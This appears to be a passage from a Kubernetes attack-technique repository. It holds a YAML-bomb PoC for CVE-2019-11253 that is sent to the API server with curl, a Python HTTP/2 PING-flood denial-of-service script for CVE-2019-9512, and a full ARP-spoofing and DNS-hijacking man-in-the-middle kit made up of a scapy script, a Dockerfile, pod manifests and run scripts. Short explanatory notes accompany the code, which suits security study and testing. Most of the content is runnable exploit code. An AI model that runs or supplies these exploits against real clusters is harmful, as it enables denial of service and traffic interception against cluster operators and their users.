d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
name: yaml-bomb
namespace: default
EOF
# Send the ConfigMap creation request to the API Server
curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @cve-2019-11253.yaml
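The ConfigMap above is a "billion laughs" style YAML bomb: each anchor level (b through i) repeats the previous level nine times, so a parser that fully expands the aliases materializes 9^9 strings from a few hundred bytes of input. A quick sketch of the expansion factor (pure arithmetic, not part of the PoC):

```python
# Level "a" holds 9 strings; each of the following 8 alias levels (b..i)
# multiplies the count by 9 when the parser expands the aliases.
levels = 9  # a through i
leaves = 9 ** levels
print(leaves)  # 387420489
```

Nearly 400 million elements is what drives the API Server's memory consumption and the resulting denial of service.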
================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py
================================================
#!/usr/bin/python
# cve-2019-9512.py
import ssl
import socket
import time
import sys
class PingFlood:
    # HTTP/2 connection preface (magic)
PREAMBLE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
    # PING frame
PING_FRAME = b"\x00\x00\x08" \
b"\x06" \
b"\x00" \
b"\x00\x00\x00\x00" \
b"\x00\x01\x02\x03\x04\x05\x06\x07"
    # WINDOW_UPDATE frame
WINDOW_UPDATE_FRAME = b"\x00\x00\x04\x08\x00\x00\x00\x00\x00\x3f\xff\x00\x01"
    # SETTINGS frame
SETTINGS_FRAME = b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x64\x00" \
b"\x04\x40\x00\x00\x00\x00\x02\x00\x00\x00\x00"
    # SETTINGS ACK frame
SETTINGS_ACK_FRAME = b"\x00\x00\x00\x04\x01\x00\x00\x00\x00"
    # HEADERS frame requesting /healthz
HEADERS_FRAME_healthz = b"\x00\x00\x29\x01\x05\x00\x00\x00\x01\x82\x04\x86\x62\x72\x8e\x84" \
b"\xcf\xef\x87\x41\x8e\x0b\xe2\x5c\x2e\x3c\xb8\x5f\x5c\x4d\x8a\xe3" \
b"\x8d\x34\xcf\x7a\x88\x25\xb6\x50\xc3\xab\xb8\xd2\xe1\x53\x03\x2a" \
b"\x2f\x2a"
def __init__(self, ip, port=6443, socket_count=1000):
        # Configure the TLS context for the Kubernetes API Server
self._context = ssl.SSLContext(ssl.PROTOCOL_TLS)
self._context.check_hostname = False
self._context.load_cert_chain(certfile="./client_cert", keyfile="./client_key_data")
self._context.load_verify_locations("./certificate_authority_data")
self._context.verify_mode = ssl.CERT_REQUIRED
# self._context.keylog_filename = "/Users/rambo/Desktop/exp/keylog"
        # ALPN protocol negotiation
self._context.set_alpn_protocols(['h2', 'http/1.1'])
self._ip = ip
self._port = port
        # Create n sockets
self._sockets = [self.create_socket() for _ in range(socket_count)]
def create_socket(self):
try:
print("[*] Creating socket...")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
            # Apply the configured TLS context
ssock = self._context.wrap_socket(sock, server_side=False)
ssock.connect((self._ip, self._port))
            # First issue a normal request to the /healthz endpoint
ssock.send(self.PREAMBLE)
ssock.send(self.SETTINGS_FRAME)
ssock.send(self.HEADERS_FRAME_healthz)
ssock.send(self.SETTINGS_ACK_FRAME)
            # Receive the responses
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(4096)
            # Return a socket ready for the attack
return ssock
except socket.error as se:
print("[-] Error: " + str(se))
            # Socket creation failed; wait a moment and retry
time.sleep(0.5)
return self.create_socket()
def attack(self):
print("[*] Flooding...")
for s in self._sockets:
try:
                # Send a PING frame without reading the response
s.send(self.PING_FRAME)
except socket.error:
self._sockets.remove(s)
self._sockets.append(self.create_socket())
if __name__ == "__main__":
dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))
dos.attack()
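Every HTTP/2 frame begins with a 9-octet header: a 24-bit payload length, an 8-bit type, an 8-bit flags field, and a 31-bit stream identifier (RFC 7540 section 4.1). A sketch decoding the PoC's hard-coded PING frame to verify those constants:

```python
PING_FRAME = (b"\x00\x00\x08"              # length: 8 octets of payload
              b"\x06"                      # type: 0x6 = PING
              b"\x00"                      # flags: none (not an ACK)
              b"\x00\x00\x00\x00"          # stream id: 0 (connection-level)
              b"\x00\x01\x02\x03\x04\x05\x06\x07")  # 8-byte opaque payload

length = int.from_bytes(PING_FRAME[0:3], "big")
frame_type, flags = PING_FRAME[3], PING_FRAME[4]
stream_id = int.from_bytes(PING_FRAME[5:9], "big") & 0x7FFFFFFF
payload = PING_FRAME[9:]
print(length, hex(frame_type), flags, stream_id)  # 8 0x6 0 0
```

Because the ACK flag is unset, the server must queue a PING ACK for every frame sent; flooding PINGs without reading responses is what exhausts the server in CVE-2019-9512.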
================================================
FILE: code/0405-云原生网络攻击/Dockerfile
================================================
FROM ubuntu:latest
COPY k8s_dns_mitm.py /poc.py
RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean
RUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn
RUN chmod u+x /poc.py
ENTRYPOINT ["/bin/bash", "-c", "/poc.py example.com "]
================================================
FILE: code/0405-云原生网络攻击/attacker.yaml
================================================
# attacker_pod
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: main
image: k8s_dns_mitm:1.0
imagePullPolicy: IfNotPresent
================================================
FILE: code/0405-云原生网络攻击/build_image.sh
================================================
#!/bin/bash
docker build -t k8s_dns_mitm:1.0 .
================================================
FILE: code/0405-云原生网络攻击/cleanup.sh
================================================
#!/bin/bash
set -e -x
kubectl delete pod victim attacker
for record in $(arp | grep cni0 | awk '{print $1}'); do
arp -d "$record"
done
================================================
FILE: code/0405-云原生网络攻击/exploit.sh
================================================
#!/bin/bash
set -e
echo "[*] Pulling curl image..."
docker pull curlimages/curl:latest
echo "[*] Creating attacker and victim pods..."
kubectl apply -f attacker.yaml
kubectl apply -f victim.yaml
echo "[*] Waiting 20s for pods' creation..."
sleep 20
echo "[*] Reading attacker's log..."
kubectl logs attacker
echo "[*] Trying to curl http://example.com in victim..."
kubectl exec -it victim -- curl http://example.com
================================================
FILE: code/0405-云原生网络攻击/k8s_dns_mitm.py
================================================
#!/usr/bin/python3
# issues about scapy with Pycharm:
# https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy
import sys
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process
from scapy.layers.inet import IP, UDP, Ether, ICMP
from scapy.layers.l2 import ARP
from scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1
from scapy.layers.dns import DNS, DNSQR, DNSRR
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("F4ke Website\n".encode('utf-8'))
class DnsProxy:
""" Handles DNS request packets, will forward them to real kube-dns, except for targeted domains. """
def __init__(self, upstream_server, local_server_mac, local_server_ip,
self_mac, self_ip, fake_domain, interface):
self.upstream_server = upstream_server
self.local_server_mac = local_server_mac
self.local_server_ip = local_server_ip
self.mac = self_mac
self.ip = self_ip
self.fake_domain = fake_domain
self.interface = interface
@staticmethod
def generate_response(request, ip=None, nx=None):
return DNS(id=request[DNS].id,
aa=1, # authoritative
qr=1, # a response
rd=request[DNS].rd, # copy recursion
qdcount=request[DNS].qdcount, # copy question count
qd=request[DNS].qd, # copy question itself
ancount=1 if not nx else 0, # we provide a single answer
an=DNSRR(
rrname=request[DNS].qd.qname,
type='A',
ttl=1,
rdata=ip) if not nx else None,
rcode=0 if not nx else 3
)
@staticmethod
def is_local_domain(domain):
for tld in (".local.", ".internal."):
if domain.decode('ascii').endswith(tld):
return True
def forward(self, req_pkt, verbose):
# first contacting local dns server
req_domain = req_pkt[DNSQR].qname
def parse_responses(p): return ', '.join(
[str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)])
# if local, get response from kube-dns
if self.is_local_domain(req_domain):
answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0,
id=req_pkt[DNS].id,
qd=DNSQR(qname=req_domain)),
verbose=verbose,
timeout=1)
resp_pkt = Ether(
src=self.local_server_mac) / IP(
dst=req_pkt[IP].src,
src=self.local_server_ip) / UDP(
sport=53,
dport=req_pkt[UDP].sport) / DNS()
            # on timeout, return NXDOMAIN
if answer:
resp_pkt[DNS] = answer[DNS]
else:
resp_pkt[DNS] = self.generate_response(req_pkt, nx=True)
sendp(resp_pkt, verbose=verbose)
print("[+] {} <- KUBE-DNS response {} - {}".format(resp_pkt[IP].dst, str(req_domain),
parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0
else resp_pkt[DNS].rcode))
        # otherwise, resolve via the upstream server
else:
answer = sr1(IP(dst=self.upstream_server) / UDP() /
DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose)
resp_pkt = Ether(
src=self.local_server_mac) / IP(
dst=req_pkt[IP].src,
src=self.local_server_ip) / UDP(
sport=53,
dport=req_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = answer[DNS]
resp_pkt[DNS].id = req_pkt[DNS].id
sendp(resp_pkt, verbose=verbose)
print("[+] {} <- UPSTREAM response {} - {}".format(resp_pkt[IP].dst, str(req_domain),
parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0
else resp_pkt[DNS].rcode))
def spoof(self, req_pkt):
spf_resp = IP(dst=req_pkt[IP].src,
src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport,
sport=53) / self.generate_response(req_pkt,
ip=self.ip)
send(spf_resp, verbose=0, iface=self.interface)
print("[+] Spoofed response to: {} | {} is at {}".format(spf_resp[IP].dst,
str(req_pkt["DNS Question Record"].qname), self.ip))
def handle_queries(self, req_pkt):
""" decides whether to spoof or forward the packet """
if req_pkt["DNS Question Record"].qname.startswith(self.fake_domain.encode(
'utf-8')):
self.spoof(req_pkt)
else:
self.forward(req_pkt, verbose=False)
def dns_req_filter(self, pkt):
return (UDP in pkt and
DNS in pkt and
pkt[DNS].opcode == 0 and
pkt[DNS].ancount == 0 and
pkt[UDP].dport == 53 and
pkt[Ether].dst == self.mac and
pkt[IP].dst == self.local_server_ip)
def start(self):
# sniffing and filtering dns queries sent to self
sniff(
lfilter=self.dns_req_filter,
prn=self.handle_queries,
iface=self.interface,
store=False)
def get_self_mac_ip():
return Ether().src, ARP().psrc
def get_kube_dns_svc_ip():
with open('/etc/resolv.conf', 'r') as f:
return f.readline().strip().split(' ')[1]
def get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose):
mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) /
UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src
answers, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst="{}/24".format(self_ip)), timeout=4, verbose=verbose)
for answer in answers:
if answer[1].src == mac:
return mac, answer[1][ARP].psrc
return None, None
def get_bridge_mac_ip(verbose):
res = srp1(Ether() / IP(dst="8.8.8.8", ttl=1) / ICMP(), verbose=verbose)
return res[Ether].src, res[IP].src
def arp_spoofing(bridge_ip, coredns_pod_ip,
bridge_mac, verbose):
while True:
send(ARP(op=2,
pdst=bridge_ip,
psrc=coredns_pod_ip,
hwdst=bridge_mac),
verbose=verbose)
def fake_http_server():
server_address = ('', 80)
server = HTTPServer(server_address, S)
server.serve_forever()
def main(verbose):
print("Kubernetes MITM Attack PoC")
print("[*] Starting HTTP Server at 80...")
p1 = Process(target=fake_http_server)
p1.start()
self_mac, self_ip = get_self_mac_ip()
print("[+] Current pod IP: %s, MAC: %s" % (self_ip, self_mac))
kube_dns_svc_ip = get_kube_dns_svc_ip()
print("[+] Kubernetes DNS service IP: %s" % kube_dns_svc_ip)
coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip(
kube_dns_svc_ip, self_ip, verbose=verbose)
print("[+] CoreDNS pod IP: %s, MAC: %s" %
(coredns_pod_ip, coredns_pod_mac))
bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose)
print("[+] CNI bridge IP: %s, MAC: %s" % (bridge_ip, bridge_mac))
print("[*] Starting ARP spoofing...")
p2 = Process(
target=arp_spoofing,
args=(
bridge_ip,
coredns_pod_ip,
bridge_mac,
verbose))
p2.start()
print("[*] Starting DNS proxy...")
# proxy dns query and response
dns_proxy = DnsProxy(
upstream_server="8.8.8.8",
local_server_mac=coredns_pod_mac,
local_server_ip=coredns_pod_ip,
self_mac=self_mac,
self_ip=self_ip,
fake_domain=sys.argv[1],
interface='eth0')
p3 = Process(target=dns_proxy.start)
p3.start()
while True:
time.sleep(1)
def usage():
print(
"Usage:\n\tpython3 {} target_domain".format(
sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) != 2:
usage()
else:
main(verbose=False)
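get_kube_dns_svc_ip above assumes the pod's /etc/resolv.conf begins with a `nameserver` line pointing at the kube-dns Service. A sketch of that parsing against a sample file body (the sample IP is the common kube-dns default, an assumption, not read from a live cluster):

```python
sample = ("nameserver 10.96.0.10\n"
          "search default.svc.cluster.local svc.cluster.local cluster.local\n")

def first_nameserver(resolv_conf_text):
    # Same logic as get_kube_dns_svc_ip: take the first line, split on a space,
    # and return the second field
    return resolv_conf_text.splitlines()[0].strip().split(' ')[1]

print(first_nameserver(sample))  # 10.96.0.10
```

If the first line were a comment or a `search` directive this would break, so the PoC implicitly relies on the layout kubelet writes for ClusterFirst DNS policy.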
================================================
FILE: code/0405-云原生网络攻击/victim.yaml
================================================
# victim pod
apiVersion: v1
kind: Pod
metadata:
name: victim
spec:
containers:
- name: main
image: curlimages/curl:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]